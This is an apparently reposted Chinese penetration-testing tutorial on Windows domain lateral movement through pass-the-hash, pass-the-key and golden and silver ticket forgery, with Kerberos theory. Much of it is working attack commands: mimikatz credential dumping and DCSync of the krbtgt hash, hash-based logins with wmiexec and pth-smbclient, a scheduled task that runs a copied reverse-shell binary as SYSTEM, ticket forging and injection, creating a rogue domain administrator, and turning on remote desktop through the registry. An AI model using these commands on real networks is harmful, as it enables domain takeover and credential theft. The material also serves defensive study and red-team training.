内网渗透pass系列攻击（超详细篇）

  内网渗透三种最常用的pass系列攻击：

• pass the hash （哈希传递攻击，简称pth）

• pass the ticket（票据传递攻击，简称ptt）

• pass the key （密钥传递攻击，简称ptk）

 环境

 哈希传递攻击(PTH攻击)

在域环境下，检测密码不是先将Hash解密再验证是否正确的。在验证输入的账号密码是否正确的时候，是通过验证Hash是否相同来进行校验的。也就是说，或许我们可以通过获取的Hash来伪造管理员账号密码登录，也就是Hash传递，又叫PTH，通过将获取的NTLM密文传递到验证登录的机器，绕过正常验证进行登录系统。

在后渗透中，获取会话之后，首先就是要获取凭证和NTLM hash值。从红队的视角来看，Pth只是横向渗透的开始。获得hash之后，攻击者就可以对它加以利用，比如他们可以尝试破解，但破解hash值还是比较困难的，费时费力，还不一定能搞到正确的密码，于是就诞生了另一种方法。我们来看一下认证过程，认证期间，首先是获取用户输入的密码，然后将其加密得到hash值，然后再把这个加密的hash值用于后期的身份认证。初始认证完成之后，windows就把这个hash值保存到内存中，这样用户在使用过程中就不用重复的输入密码。在凭证转存中，我们可以看到，我们提取了很多的hash值。作为攻击者，我们是不知道密码的，所以在认证的时候，我们直接提供hash值，不用提供密码，windows就会与保存的hash值对比，一致的话，认证就会通过。这就是所谓的pth攻击了。

IPC

SMB

WMI

RPC

  IPC$概念

IPC$(Internet Process Connection)是共享”命名管道”的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

IPC$的使用条件：开放了139、445端口；目标开启IPC$文件共享；获取用户账号密码。139 或 445 端口开启:ipc 连接可以实现远程登录及对默认共享的访问;而 139 端口 的开启表示 netbios 协议的应用，我们可以通过 139、445 端口实现对共享文件/打印机的访 问

在内网中，默认就会开启IPC$共享文件服务，默认会将C盘共享出来，也就是说，我们可以通过IPC获取目标C盘的权限。

 IPC$常用命令

 IPC$命令执行

0.创建连接

net use \192.168.88.135ipc$ chen@2021 /user:edu.orgAdministrator #可以使用其他非管理员用户进行连接，但会拒绝访问，通常使用Administrator

1.通过at命令制定计划进行命令执行。(新版本at命令已经废弃)

at \192.168.1.1 11:15am cmd /c "whoami"

2.通过schtasks进行计划任务命令执行

copy C:reverse.exe \192.168.88.131c$reverse.exe schtasks /create /tn task1 /tr "C:reverse.exe" /sc MINUTE /mo 1 /s 192.168.88.131 /RU system /fschtasks /run /tn task1 /s 192.168.88.131

 IPC$常见错误号

错误号 5，拒绝访问 : 很可能你使用的用户不是管理员权限的，先提升权限;错误号 51，Windows 无法找到网络路径 : 网络有问题;错误号 53，找不到网络路径 : ip 地址错误;目标未开机;目标 lanmanserver 服务未启动; 目标有防火墙(端口过滤);错误号 67，找不到网络名 : 你的 lanmanworkstation 服务未启动;目标删除了 ipc$;错误号 1219，提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个 ipc$，请删除再连。错误号 1326，未知的用户名或错误密码:原因很明显了;错误号 1792，试图登录，但是网络登录服务没有启动:目标 NetLogon 服务未启动。(连接 域控会出现此情况)错误号 2242，此用户的密码已经过期:目标有帐号策略

以管理员身份运行mimikatz.exe，然后执行以下命令

privilege::debugsekurlsa::logonpasswords #hash和明文密码获取sekurlsa::pth /user:administrator /domain:edu.org /ntlm:414c0887a2140df4d6f2daa20d2adf6f

执行完之后会弹出一个命令提示符，执行dir \192.168.88.131c$成功无需账号密码获取了域控机器的c盘的权限，列出了c盘的文件

可以把域内IP都遍历一遍，弹出目录的就是存在密码一样。

 ①利用Psexec进行交互

提权获取一个域控机器的cmd命令提示符，移动到psexec所在目录，执行以下命令（因为psexec是微软自带的工具所以在白名单内)，不过很多杀软已经列入黑名单了

psexec64 \192.168.88.131 cmd

 ②计划任务反弹shell

• (IPC$未登录,但已知明文账号密码情况)

• C:Windowssystem32>copy C:reverse.exe \192.168.88.131c$reverse.exe #复制木马文件到目标机器C:Windowssystem32>schtasks /create /tn task1 /U  edu.orgeas  /P chen@2021  /tr "C:reverse.exe" /sc MINUTE /mo 1 /s 192.168.88.131 /RU system /f#创建计划任务C:Windowssystem32>schtasks /run /tn task1 /U  edu.orgeas  /P chen@2021 /s 192.168.88.131#运行计划任务C:Windowssystem32>schtasks /delete /tn task1 /f /U  edu.orgeas  /P chen@2021 /s 192.168.88.131#删除计划任务

• IPC$已登录情况，省略账号密码

• C:Windowssystem32>schtasks /create /tn task1 /tr "C:reverse.exe" /sc MINUTE /mo 1 /s 192.168.88.131 /RU system /f成功: 成功创建计划任务 "task1"。C:Windowssystem32>schtasks /run /tn task1 /s 192.168.88.131成功: 尝试运行 "task1"。

一分钟后MSF接收到shell

利用条件开启445端口445端口没被过滤

 ①msf-windows/smb/psexec模块

 ②kali自带工具pth-smbclient

pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$

wmi.exe工具下载

 WMIC的利用

WMI的全名为“Windows Management Instrumentation”。从Windows 98开始，Windows操作系统都支持WMI。WMI是由一系列工具集组成的，可以在本地或者远程管理计算机系统。WMI为用户提供了基本信息，并且让用户有权限执行各种管理任务。这种权限是通过身份认证来实现的。当我们有了凭证的时候，我们就可以执行pth攻击来通过身份认证了。

自从PsExec在内网中被严格监控后，越来越多的反病毒厂商将PsExec加入了黑名单，于是攻击者逐渐开始使用WMI进行横向移动。通过渗透测试发现，在使用wmiexec进行横向移动时，Windows操作系统默认不会将WMI的操作记录在日志中，同时攻击脚本无需写入到磁盘，具有极高的隐蔽性。因为在这个过程中不会产生日志，所以，对网络管理员来说增加了攻击溯源的成本。而对攻击者来说，其恶意行为被发现的可能性有所降低、隐蔽性有所提高。由此，越来越多的APT开始使用WMI进行攻击，利用WMI可以进行信息收集、探测、反病毒、虚拟机检测、命令执行、权限持久化等操作。

利用条件WMI 服务开启(默认开启)目标主机开放135和445端口。(135 端⼝是 WMIC 默认的管理端⼝，wimcexec 使⽤445端⼝传回显)135 端口未被过滤(防火墙拦截)

wmiexec.exe -hashes 00000000000000000000000000000000:414c0887a2140df4d6f2daa20d2adf6f edu.org/Administrator@192.168.88.135

wmiexec.exe administrator:chen@2021@192.168.88.135

• 利用系统自带的工具 wmic 在目标主机上执行任意命令

远程创建进程

wmic /node:192.168.88.135 /user:edu.orgAdministrator /password:chen@2021 process call create "cmd.exe /c echo 123 > c:1.txt"

缺点:无法回显命令

 密钥传递攻击(PTK攻击)

ptk是在域中攻击kerberos认证的一种方式，原理是通过获取用户的aes hmac，通过kerberos认证，可在NTLM认证被禁止的情况下用来实现类似pth的功能。

mimikatz # privilege::debugmimikatz # sekurlsa::ekeys

 mimikatz模块的使用需要Administrator权限或者System权限。MSF中自带mimikatz模块，MSF中的 mimikatz 模块同时支持32位和64位的系统，但是该模块默认是加载32位的系统，所以如果目标主机是64位系统的话，直接默认加载该模块会导致很多功能无法使用。而且在64位系统下必须先查看系统进程列表，然后将meterpreter进程迁移到一个64位程序的进程中，才能加载mimikatz并且查看系统明文。但是在32位系统下则没有这个限制。

先提权，然后进程迁移到一个x64又是管理员的进程

加载mimikatz模块，执行mimikatz命令，获取aes_hmac

beacon> mimikatz "sekurlsa::ekeys"

在实际上，PTK传递比PTH传递用的少，因为PTK传递需要一个前提条件，主机必须打了补丁kb2871997

sekurlsa::pth /user:administrator /domain:edu.org /aes256:30d6609fbfd3209395999076705feb371739f36da318aa90b33c19b75241b1aa

在弹出的cmd里利用dir进行域内所有机器的遍历

dir \192.168.88.0c$ …..dir \192.168.88.255c$，如果不是显示账号密码不正确就说明目标机器的hash和该机器一样。

 票据传递攻击(PTT攻击)

弄清Kerberos认证过程，最有利于帮助我们理解域内的金票和银票。Kerberos是一种网络身份验证协议,旨在通过密钥加密技术为客户端/服务器应用程序提供身份验证,主要用在域环境下的身份验证。

域控的账号密码可以登录域内任意一台主机，那么主机是如何检测域控账号密码是否正确的呢？检验账号密码可以有两种方法，询问域控或者设置一个专门检测账号密码是否正确的第三方中心。在域中便使用到了第三方中心来检验输入的账号密码是否相同。这种第三方中心叫KDC密钥分发中心。

  几个相关的名词

 ①KDC

KDC（Key Distribution Center）密钥分发中心，维护所有账户的名称和Master Key（key的hash code）
在KDC中又分为两个部分：Authentication Service(AS,身份验证服务)和Ticket Granting Service(TGS,票据授权服务)

 ②AS

授权服务（Authorization Server），对于上面的流程1，提供初始授权认证，用户表明需求并使用密码对请求进行加密，AS用提供的密码对请求进行解密后得到的请求内容，返回给用户一个TGT（票据授权票据 ticket granting tickets）（用一个密码加密）

 ③TGS

用户得到TGT之后使用TGT去访问TGS（票据授权中心Ticket Granting Server），

TGS验证TGT后（使用密钥解密），返回一个Ticket给用户；用户得到Ticket后去访问Server，Server收到Ticket和KDC进行验证，通过后提供服务

 ④DC和AD

DC是Domain Controller的缩写,即域控制器;AD是Active Directory的缩写,即活动目录。
DC中有一个特殊用户叫做:krbtgt,它是一个无法登录的账户,是在创建域时系统自动创建的,在整个kerberos认证中会多次用到它的Hash值去做验证。
AD会维护一个Account Database(账户数据库). 它存储了域中所有用户的密码Hash和白名单。只有账户密码都在白名单中的Client才能申请到TGT

 ⑤票据

在内网渗透中，票据分为白银票据和黄金票据。分别对应域普通用户的票据和域管理员的票据。票据就是Kerberos认证协议的Ticket，因为已经经过了AS和TGS的校验，所以获取了票据之后，可以任意登录目标主机

 ⑥krbtgt用户

在查询域内用户的时候，总会看到一个用户叫krbtgt。krbtgt账户其实就是KDC秘钥分发中心用的超管账户。我们拿着krbtgt账户的票据，去访问域内机器，目标主机会认为我们是KDC秘钥分发中心，所以直接给了最高的权限允许我们访问。

 kerberos认证过程

 粗略的验证流程

如果把 Kerberos 中的票据一类比作一张门禁卡,那么 Client 端就是住客,Server 端就是房间,而 KDC 就是小区的门禁。住客想要进入小区,就需要手里的门禁卡与门禁想对应,只有通过门禁的检验,才能打开门禁进入小区。

需要注意的是,小区门禁卡只有一张,而Kerberos认证则需要两张票

 详解认证流程

当 Client 想要访问 Server 上的某个服务时,需要先向 AS 证明自己的身份,验证通过后AS会发放的一个TGT,随后Client再次向TGS证明自己的身份,验证通过后TGS会发放一个ST,最后Client向 Server 发起认证请求,认证通过后，开始和Client交互。

 第一步Client与AS交互

 请求：

Client向KDC的Authentication Service发送Authentication Service Request（KRB_AS_REQ）。

内容包含：

• Pre-authentication data：包含用以证明自己身份的信息。就是证明自己知道自己声称的那个account的Password。一般地，它的内容是一个被Client的Master key加密过的Timestamp。

• Client name & realm

• KDC的Ticket Granting Service的Server Name

响应：

AS（Authentication Service）通过它接收到的KRB_AS_REQ验证发送方的是否是在Client name & realm中声称的那个人，也就是说要验证发送放是否知道Client的Password。所以AS只需从Account Database中提取Client对应的Master Key对Pre-authentication data进行解密，如果是一个合法的Timestamp，则可以证明发送方提供的是正确无误的密码。

验证通过之后，AS将一份Authentication Service Response（KRB_AS_REP）发送给Client。

KRB_AS_REQ主要包含两个部分：

• 被Client的Master Key加密过的Logon Session Key

• 被自己（KDC）的Key加密过的TGT。TGT主要包含三部分内容：

（1）经过KDC中的krbtgt的密码HASH加密的 Logon Session Key(登录会话密钥)（2）Client name & realm （3）End Time：TGT的到期时间

Client通过自己的Master Key对第一部分解密获得Logon Session Key之后，携带着TGT便可以进入下一步：TGS（Ticket Granting Service）Exchange。

 第二步Client与TGS交互

 请求：

Client向KDC中的TGS（Ticket Granting Service）发送Ticket Granting Service Request（KRB_TGS_REQ）

内容包括：

• TGT：Client通过AS Exchange获得的被KDC Key加密的Ticket Granting Ticket。

• Authenticator：用以证明当初TGT的拥有者是否就是自己，所以它用Logon Session Key来进行加密。

  内容包括：（1）Client Info （2）Timestamp

• Client name & realm

• Server name & realm：这是Client试图访问的那个Server

响应：

TGS先通过自己的Master Key对Client提供的TGT进行解密，从而获得这个Logon Session Key。再通过这个Logon Session Key解密Authenticator进行验证。TGS验证通过后发ST(Service Ticket)票。

认证通过后TGS生成使用Logon Session Key（SKDC-Client）加密过用于Client和Server之间通信的Session Key（SServer-Client），Server的Master Key进行加密的ST(Service Ticket)

内容包括：

• 经过 Logon session key加密的Client和Server之间的Session Key

• 经过Server的Master Key进行加密的ST(Service Ticket)。

Ticket包含以下一些内容：
（1）Session Key （2）Client name & realm（3）End Time：Ticket的到期时间

Client 收到TGS的响应，使用 Logon session key，解密第一部分后获得 Session Key （注意区分 Logon Session Key 与 Session Key 分别是什么步骤获得的，及其的区别）。有了 Session Key 和 ST(Service Ticket)， Client 就可以直接和 Server 进行交互，而无须在通过 KDC 作中间人了。

 第三步Client与Server交互

Client向Server发送KRB_AP_REQ

内容包括：

• Ticket：Client 通过TGS Exchange获得的被Server Key加密的Ticket

• Authenticator：用以证明Ticket的拥有者是否就是自己，所以用Session Key进行加密。

  内容包括：（1）Client Info（2）Timestamp

• Flag：用于表示Client是否需要进行双向验证

 响应：

Server接收到Request之后,首先通过自己的Master Key(krbtgt的密码hash处理)解密ST，从而获得Session Key（SServer-Client）。通过Session Key（SServer-Client）解密Authenticator，进而验证对方的身份。验证成功，让Client访问需要访问的资源，否则直接拒绝对方的请求。

对于需要进行双向验证，Server从Authenticator提取Timestamp，使用Session Key（SServer-Client）进行加密，并将其发送给Client用于Client验证Server的身份。

 双向认证：
到目前为止，服务端已经完成了对客户端的验证，但是，整个认证过程还没有结束。接下来就是Client对Server进行验证以确保Client所访问的不是一个钓鱼服务.

 Client验证Server：
Server需要将Authenticator3中解密出来的Timestamp再次用Session Key进行加密,并发送给Client。Client再用缓存Session Key进行解密,如果Timestamp和之前的内容完全一样,则可以证明此时的Server是它想访问的Server。

 原理

在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中，krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash，就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。

 伪造金票的所需条件

1、域名称2、域的krbtgt用户的SID3、域的krbtgt账号的HASH4、伪造任意用户名

 HASH和SID获取

上传mimikatz到域控主机,以管理员权限运行CMD

执行以下命令获取krbtgt用户的hash

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:edu.org /all /csv" "exit">log.txt

再执行以下命令可以看到krbtgt用户的SID

lsadump::dcsync /domain:edu.org /user:krbtgt

注：原Object Security ID最后面有个-502是作为标识的，在制作时需要手动删除

 黄金票据制作

1、/user: 指定伪造的用户名，一般是Administrator2、/sid: 域的sid值3、/domain: 指定域名4、/krbtgt: 域内用户krbtgt的ntlm hash值

kerberos::golden /user:Administrator /sid:域内sid /krbtgt:ntlm-hash /domain:域名 /ticket:ticket.kirbikerberos::golden /user:Administrator /sid:S-1-5-21-3658974542-4157274802-4269447764 /krbtgt:129d836ceeac69cbb52340ef1bbdc6d3 /domain:edu.org /ticket:ticket.kirbi

先通过kerberos::purge清空票据缓存；kerberos::list列出票据显示为空，说明清空了所以票据

kerberos::purgekerberos::list

把票据载入内存

kerberos::ptt ticket.kirbi

注：如果以管理员权限打开的mimikatz，则需要用管理员权限打开CMD,不然会连接不上目标机器

是否真正写入内存需要打开cmd用以下命令验证，只有缓存是1才是真正写入

klist

另外两种执行方法

①用cmd运行mimikatz

mimikatz.exe "privilege::debug" "kerberos::golden /user:Administrator /sid:S-1-5-21-3658974542-4157274802-4269447764 /krbtgt:129d836ceeac69cbb52340ef1bbdc6d3 /domain:edu.org /ptt" "exit"

②用mimikatz执行写入内存

kerberos::golden /user:Administrator /sid:S-1-5-21-3658974542-4157274802-4269447764 /krbtgt:129d836ceeac69cbb52340ef1bbdc6d3 /domain:edu.org /ptt

 利用

 ①创建超管用户，然后利用超管用户登录域内其他主机接管。

net user chen qaz@123! /add /domainnet group "domain admins" chen /add /domain执行dir的时候连接DC,测试金票伪造是否成功只能使用主机名拼接域名，用IP去测试会失败。

 执行命令打开域内其他目标机器3389端口

wmic /node:192.168.88.135 /user:edu.orgchen /password:qaz@123! process call create 'cmd.exe /c REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'

然后利用chen这个刚创建的超管用户进行远程登录机器接管

  ②利用PsExec提权进行交互

 用金票进行访问域内的其他主机复现失败(不知道为啥)

 原理

如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。
在Kerberos认证的第三部，Client带着ST和Authenticator3向Server上的某个服务进行请求，Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。
所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。

 伪造银票的所需条件

1、/domain: 指定域名2、/sid: 客户端用户的sid号3、/target: 需要访问的域服务器的计算机全名4、/rc4: 目标服务器的NTLM Hash值 通常情况下，例如目标机器名为m1sn0w，那么这里需要指定的NTLM Hash值应该为m1sn0w$账号对应的NTLM Hash值5、/service：需要伪造的服务，例如cifs访问文件服务6、/user: 指定需要伪造的用户，一般使用Administrator

服务类型可以从以下内容中来进行选择，因为我们没有TGT去不断申请ticket，所以只能针对某一些服务来进行伪造

  所需要的信息获取

 客户端用户的sid号

sid值：这里需要指定域内的sid值，我们可以通过whoami /all来进行查询

whoami /all

 目标机器的NTLM Hash值

目标机器的NTLM Hash值，而不是域内账号的NTLM Hash值。拿着域管的NTLM Hash去生成白银票据，发现是不能进行横向移动的。这里需要指定机器的NTLM Hash值，也就是说需要指定机器本地账户的NTLM Hash值。通常情况下，例如目标机器名为m1sn0w，那么这里需要指定的NTLM Hash值应该为m1sn0w$账号对应的NTLM Hash值。(如果hostname查出的机器名字是大写EAS3,则对应的hash的username也必须是大写EAS3，而不是小写eas3)

 白银票据制作

kerberos::golden /domain:edu.org /sid:S-1-5-21-3485537082-426029256-2976247771 /target:EAS3.edu.org /rc4:fd6054cb66b99ee07c3ef0c0ae85b4f2 /service:cifs /user:Administrator /ptt

 利用

  利用PsExec提权进行交互

 获取的权限不同

金票：伪造的TGT，可以获取任意Kerberos的访问权限
银票：伪造的ST，只能访问指定的服务，如CIFS

 认证流程不同

金票：同KDC交互，但不同AS交互
银票：不同KDC交互，直接访问Server

 加密方式不同

金票：由krbtgt NTLM Hash 加密
银票：由服务账号 NTLM Hash 加密

关注听风安全，技术更上一层楼~

原文始发于微信公众号（猫蛋儿安全）：内网渗透pass系列攻击（超详细篇）